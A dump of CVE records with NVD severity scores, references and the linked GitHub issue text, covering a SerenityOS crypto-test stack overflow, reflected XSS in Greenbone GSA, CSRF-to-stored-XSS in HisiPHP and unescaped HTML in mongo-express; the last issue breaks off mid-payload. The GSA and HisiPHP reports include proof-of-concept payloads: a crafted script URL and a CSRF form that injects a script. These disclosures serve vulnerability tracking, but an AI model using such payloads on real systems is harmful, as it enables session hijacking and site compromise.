{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/7072" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/7072" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:serenityos:serenityos:-:*:*:*:*:*:*:*", "matchCriteriaId": "F0A631C0-3E3F-4FC9-8E7D-8843F0133B9C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/SerenityOS/serenity/issues/7072
[ "Third Party Advisory" ]
github.com
[ "SerenityOS", "serenity" ]
The `AES CTR 36 octets with 128 bit key | Encrypt` test (test-crypto.cpp:832) causes a stack buffer overflow in the `in` array of 36 bytes: ``` { // Test Vector #3 I_TEST((AES CTR 36 octets with 128 bit key | Encrypt)) u8 key[] { 0x76, 0x91, 0xbe, 0x03, 0x5e, 0x50, 0x20, 0xa8, 0xac, 0x6e, 0x61, 0x85, 0x29, 0xf9, 0xa0, 0xdc }; u8 ivec[] { 0x00, 0xe0, 0x01, 0x7b, 0x27, 0x77, 0x7f, 0x3f, 0x4a, 0x17, 0x86, 0xf0, 0x00, 0x00, 0x00, 0x00 + 1 // See CTR.h }; u8 in[] { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23 }; u8 out[] { 0xc1, 0xcf, 0x48, 0xa8, 0x9f, 0x2f, 0xfd, 0xd9, 0xcf, 0x46, 0x52, 0xe9, 0xef, 0xdb, 0x72, 0xd7, 0x45, 0x40, 0xa4, 0x2b, 0xde, 0x6d, 0x78, 0x36, 0xd5, 0x9a, 0x5c, 0xea, 0xae, 0xf3, 0x10, 0x53, 0x25, 0xb2, 0x07, 0x2f }; test_it(AS_BB(key), AS_BB(ivec), AS_BB(in), AS_BB(out)); } ``` <details> <summary> Test run details with ASAN backtrace </summary> ``` 2/87 Test #2: Crypto ...............................***Failed 0.07 sec Testing (AES CBC class name)... PASS 0s 76us Testing (AES CBC with 128 bit key | Encrypt)... PASS 0s 15us Testing (AES CBC with 192 bit key | Encrypt)... PASS 0s 7us Testing (AES CBC with 256 bit key | Encrypt)... PASS 0s 7us Testing (AES CBC with 256 bit key | Encrypt with unsigned key)... PASS 0s 4us Testing (AES CTR class name)... PASS 0s 3us Testing (AES CTR 16 octets with 128 bit key | Encrypt)... PASS 0s 6us Testing (AES CTR 32 octets with 128 bit key | Encrypt)... PASS 0s 3us Testing (AES CTR 36 octets with 128 bit key | Encrypt)... ================================================================= ==14860==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe06703494 at pc 0x55fb55fb6b6a bp 0x7ffe06702320 sp 0x7ffe06702310 READ of size 1 at 0x7ffe06703494 thread T0 #0 0x55fb55fb6b69 in Crypto::Cipher::AESCipherBlock::apply_initialization_vector(unsigned char const*) /home/andrew/serenity/Meta/Lagom/../../Userland/Libraries/LibCrypto/Cipher/AES.h:43 #1 0x55fb55fb6b69 in Crypto::Cipher::CTR<Crypto::Cipher::AESCipher, Crypto::Cipher::IncrementInplace>::encrypt_or_stream(AK::Span<unsigned char const> const*, AK::Span<unsigned char>&, AK::Span<unsigned char const>, AK::Span<unsigned char>*) /home/andrew/serenity/Meta/Lagom/../../Userland/Libraries/LibCrypto/Cipher/Mode/CTR.h:171 #2 0x55fb55fb7b52 in Crypto::Cipher::CTR<Crypto::Cipher::AESCipher, Crypto::Cipher::IncrementInplace>::encrypt(AK::Span<unsigned char const>, AK::Span<unsigned char>&, AK::Span<unsigned char const>, AK::Span<unsigned char>*) /home/andrew/serenity/Meta/Lagom/../../Userland/Libraries/LibCrypto/Cipher/Mode/CTR.h:118 #3 0x55fb55f2e89a in operator()<AK::Span<unsigned char const>, AK::Span<unsigned char const>, AK::Span<unsigned char const>, AK::Span<unsigned char const> > /home/andrew/serenity/Userland/Utilities/test-crypto.cpp:783 #4 0x55fb55f300cc in aes_ctr_test_encrypt /home/andrew/serenity/Userland/Utilities/test-crypto.cpp:845 #5 0x55fb55f31ce7 in aes_ctr_tests /home/andrew/serenity/Userland/Utilities/test-crypto.cpp:757 #6 0x55fb55ed808f in main /home/andrew/serenity/Userland/Utilities/test-crypto.cpp:434 #7 0x7f22a270b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #8 0x55fb55edc60d in _start (/home/andrew/serenity/BuildLagom/test-crypto+0xb7160d) Address 0x7ffe06703494 is located in stack of thread T0 at offset 2788 in frame #0 0x55fb55f2f36f in aes_ctr_test_encrypt /home/andrew/serenity/Userland/Utilities/test-crypto.cpp:777 This frame has 80 object(s): [32, 48) '<unknown>' [64, 80) '<unknown>' [96, 112) '<unknown>' [128, 144) '<unknown>' [160, 176) '<unknown>' [192, 208) '<unknown>' [224, 240) '<unknown>' [256, 272) '<unknown>' [288, 304) '<unknown>' [320, 336) '<unknown>' [352, 368) '<unknown>' [384, 400) '<unknown>' [416, 432) '<unknown>' [448, 464) '<unknown>' [480, 496) '<unknown>' [512, 528) '<unknown>' [544, 560) '<unknown>' [576, 592) '<unknown>' [608, 624) '<unknown>' [640, 656) '<unknown>' [672, 688) '<unknown>' [704, 720) '<unknown>' [736, 752) '<unknown>' [768, 784) '<unknown>' [800, 816) '<unknown>' [832, 848) '<unknown>' [864, 880) '<unknown>' [896, 912) '<unknown>' [928, 944) '<unknown>' [960, 976) '<unknown>' [992, 1008) '<unknown>' [1024, 1040) '<unknown>' [1056, 1072) '<unknown>' [1088, 1104) '<unknown>' [1120, 1136) '<unknown>' [1152, 1168) '<unknown>' [1184, 1200) '<unknown>' [1216, 1232) '<unknown>' [1248, 1264) '<unknown>' [1280, 1296) '<unknown>' [1312, 1328) 'key' (line 798) [1344, 1360) 'ivec' (line 801) [1376, 1392) 'in' (line 804) [1408, 1424) 'out' (line 807) [1440, 1456) 'key' (line 815) [1472, 1488) 'ivec' (line 818) [1504, 1520) 'key' (line 833) [1536, 1552) 'ivec' (line 836) [1568, 1584) 'ivec' (line 853) [1600, 1616) 'in' (line 856) [1632, 1648) 'out' (line 859) [1664, 1680) 'ivec' (line 870) [1696, 1712) 'ivec' (line 887) [1728, 1744) 'ivec' (line 904) [1760, 1776) 'in' (line 907) [1792, 1808) 'out' (line 910) [1824, 1840) 'ivec' (line 921) [1856, 1872) 'ivec' (line 938) [1888, 1904) 'ivec' (line 956) [1920, 1944) 'key' (line 850) [1984, 2008) 'key' (line 867) [2048, 2072) 'key' (line 884) [2112, 2144) 'in' (line 821) [2176, 2208) 'out' (line 824) [2240, 2272) 'in' (line 873) [2304, 2336) 'out' (line 876) [2368, 2400) 'key' (line 901) [2432, 2464) 'key' (line 918) [2496, 2528) 'in' (line 924) [2560, 2592) 'out' (line 927) [2624, 2656) 'key' (line 935) [2688, 2720) 'key' (line 953) [2752, 2788) 'in' (line 839) <== Memory access at offset 2788 overflows this variable [2832, 2868) 'out' (line 842) [2912, 2948) 'in' (line 890) [2992, 3028) 'out' (line 893) [3072, 3108) 'in' (line 941) [3152, 3188) 'out' (line 944) [3232, 3268) 'in' (line 959) [3312, 3348) 'out' (line 962) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/andrew/serenity/Meta/Lagom/../../Userland/Libraries/LibCrypto/Cipher/AES.h:43 in Crypto::Cipher::AESCipherBlock::apply_initialization_vector(unsigned char const*) Shadow bytes around the buggy address: 0x100040cd8640: f8 f8 f2 f2 f2 f2 f8 f8 f8 f8 f2 f2 f2 f2 00 00 0x100040cd8650: 00 00 f2 f2 f2 f2 00 00 00 00 f2 f2 f2 f2 00 00 0x100040cd8660: 00 00 f2 f2 f2 f2 00 00 00 00 f2 f2 f2 f2 00 00 0x100040cd8670: 00 00 f2 f2 f2 f2 00 00 00 00 f2 f2 f2 f2 00 00 0x100040cd8680: 00 00 f2 f2 f2 f2 00 00 00 00 f2 f2 f2 f2 00 00 =>0x100040cd8690: 00 00[04]f2 f2 f2 f2 f2 00 00 00 00 04 f2 f2 f2 0x100040cd86a0: f2 f2 00 00 00 00 04 f2 f2 f2 f2 f2 00 00 00 00 0x100040cd86b0: 04 f2 f2 f2 f2 f2 00 00 00 00 04 f2 f2 f2 f2 f2 0x100040cd86c0: 00 00 00 00 04 f2 f2 f2 f2 f2 00 00 00 00 04 f2 0x100040cd86d0: f2 f2 f2 f2 00 00 00 00 04 f3 f3 f3 f3 f3 00 00 0x100040cd86e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==14860==ABORTING ``` </summary>
Tests: test-crypto has stack-buffer-overflow when AES encrypting 36 octets
https://api.github.com/repos/SerenityOS/serenity/issues/7072/comments
0
2021-05-13T07:24:04Z
2021-05-14T07:39:29Z
https://github.com/SerenityOS/serenity/issues/7072
890,803,977
7,072
2,087
CVE-2019-25047
2021-06-21T15:15:07.923
Greenbone Security Assistant (GSA) before 8.0.2 and Greenbone OS (GOS) before 5.0.10 allow XSS during 404 URL handling in gsad.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/greenbone/gsa/blob/master/CHANGELOG.md#802---2020-05-13" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/greenbone/gsa/issues/1601" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/greenbone/gsa/pull/1603" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/greenbone/gsa/blob/master/CHANGELOG.md#802---2020-05-13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/greenbone/gsa/issues/1601" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/greenbone/gsa/pull/1603" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:greenbone:greenbone_security_assistant:*:*:*:*:*:*:*:*", "matchCriteriaId": "1211B3B2-51E3-4D57-AEBA-E64FE41C1570", "versionEndExcluding": "8.0.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:greenbone:greenbone_os:*:*:*:*:*:*:*:*", "matchCriteriaId": "33175F80-AEB1-4E4D-B3C6-B285D7352A51", "versionEndExcluding": "5.0.10", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/greenbone/gsa/issues/1601
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "greenbone", "gsa" ]
### Expected behavior Escaping part of URL and redirecting to /login page. ### Actual behavior When clicking on a specially crafted URL, JavaScript Code gets executed. ### Steps to reproduce https://SERVER-IP/%0a%0a%3Cscript%3Ealert('Vulnerable');%3C/script%3Ewebsite.jsp ### GVM versions **gsa:** 8.0.0 **gvm:** 8.0.0 **openvas-scanner:** 6.0.0 **gvm-libs:** ### Environment **Operating system:** found with nikto v2.1.6 verified with Firefox Quantum 68.0.2esr (64-Bit) **Installation method / source:** (packages, source installation) ### Logfiles <!-- in most cases you'll find the logs in /var/log/gvm/ --> ``` ```
Reflected XSS in GSA possible.
https://api.github.com/repos/greenbone/gsa/issues/1601/comments
2
2019-09-02T13:48:06Z
2021-07-01T06:12:05Z
https://github.com/greenbone/gsa/issues/1601
488,199,530
1,601
2,088
CVE-2020-21130
2021-06-21T16:15:07.943
Cross Site Scripting (XSS) vulnerability in HisiPHP 2.0.8 via the group name in addgroup.html.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hisiphp/hisiphp/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hisiphp/hisiphp/issues/7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hisiphp:hisiphp:2.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "050C9382-32F4-4D68-A717-B35E98C2E6E3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/hisiphp/hisiphp/issues/7
[ "Exploit", "Third Party Advisory" ]
github.com
[ "hisiphp", "hisiphp" ]
When adding a group ![image](https://user-images.githubusercontent.com/24249321/67947499-be186900-fc1e-11e9-8512-4d46b68c1966.png) it has CSRF to add a group ![image](https://user-images.githubusercontent.com/24249321/67947726-40089200-fc1f-11e9-9c0c-42fd21894f07.png) The group's name could contain XSS payload. then it has stored XSS ![image](https://user-images.githubusercontent.com/24249321/67947976-b0afae80-fc1f-11e9-98a1-49cf9852bf41.png) # CSRF poc ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/admin.php/system/config/addgroup.html" method="POST"> <input type="hidden" name="name" value="qwer:<script>alert('hhhhhhhh')</script>" /> <input type="submit" value="Submit request" /> </form> </body> </html> ```
from CSRF to stored XSS Stealing administrator cookies
https://api.github.com/repos/hisiphp/hisiphp/issues/7/comments
1
2019-10-31T12:49:29Z
2019-10-31T14:35:42Z
https://github.com/hisiphp/hisiphp/issues/7
515,406,977
7
2,089
CVE-2021-21422
2021-06-21T19:15:07.947
mongo-express is a web-based MongoDB admin interface, written with Node.js and express. 1: As mentioned in this issue: https://github.com/mongo-express/mongo-express/issues/577, when the content of a cell grows larger than supported size, clicking on a row will show full document unescaped, however this needs admin interaction on cell. 2: Data cells identified as media will be rendered as media, without being sanitized. Example of different renders: image, audio, video, etc. As an example of type 1 attack, an unauthorized user who only can send a large amount of data in a field of a document may use a payload with embedded javascript. This could send an export of a collection to the attacker without even an admin knowing. Other types of attacks such as dropping a database\collection are possible.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mongo-express/mongo-express/commit/f5e0d4931f856f032f22664b5e5901d5950cfd4b" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mongo-express/mongo-express/issues/577" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mongo-express/mongo-express/security/advisories/GHSA-7p8h-86p5-wv3p" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mongo-express/mongo-express/commit/f5e0d4931f856f032f22664b5e5901d5950cfd4b" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mongo-express/mongo-express/issues/577" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mongo-express/mongo-express/security/advisories/GHSA-7p8h-86p5-wv3p" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "96B2C676-07A1-4C7A-86FA-D88297385A5E", "versionEndExcluding": null, "versionEndIncluding": "0.54.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:mongo-express_project:mongo-express:1.0.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "5D0C8EFC-6C4D-4467-8E90-125A9496B3BB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:mongo-express_project:mongo-express:1.0.0:alpha3:*:*:*:*:*:*", "matchCriteriaId": "63E82692-361F-4E81-8126-F15C3D904528", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/mongo-express/mongo-express/issues/577
[ "Exploit", "Third Party Advisory" ]
github.com
[ "mongo-express", "mongo-express" ]
Version: docker-image latest (as of 29.05.2020 - Docker Image mongo-express:latest@sha256:bae0a154c4d73f1e61a532148942c582fbfad22944638d4307a4710daa1398b6) ## Problem I use a MongoDB collection to save HTML-Dokuments in a string property of documents and use mongo-express to access the Mongo Database. Especially when the properties with the HTML content are not loaded directly because of their size and I click on ```*** LARGE PROPERTY ***~106 KBPreview:"Click to fetch this property``` the HTML content is loaded and rendered by the browser. If you need further information please feel free to ask - I'll try to answer as fast as possible. ## Reconstruction If you create a Collection e.g. with mongo-express and create a document like the following. Bigger than 100kB and starting with HTML tags. Save the document and when you look in the HTML sources of the collection-view page than you will find that the HTML tags are not escaped. ``` { _id: ObjectId('5ed226e15df10e00077733ba'), html: '<!DOCTYPE html> </table>hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! hello world! 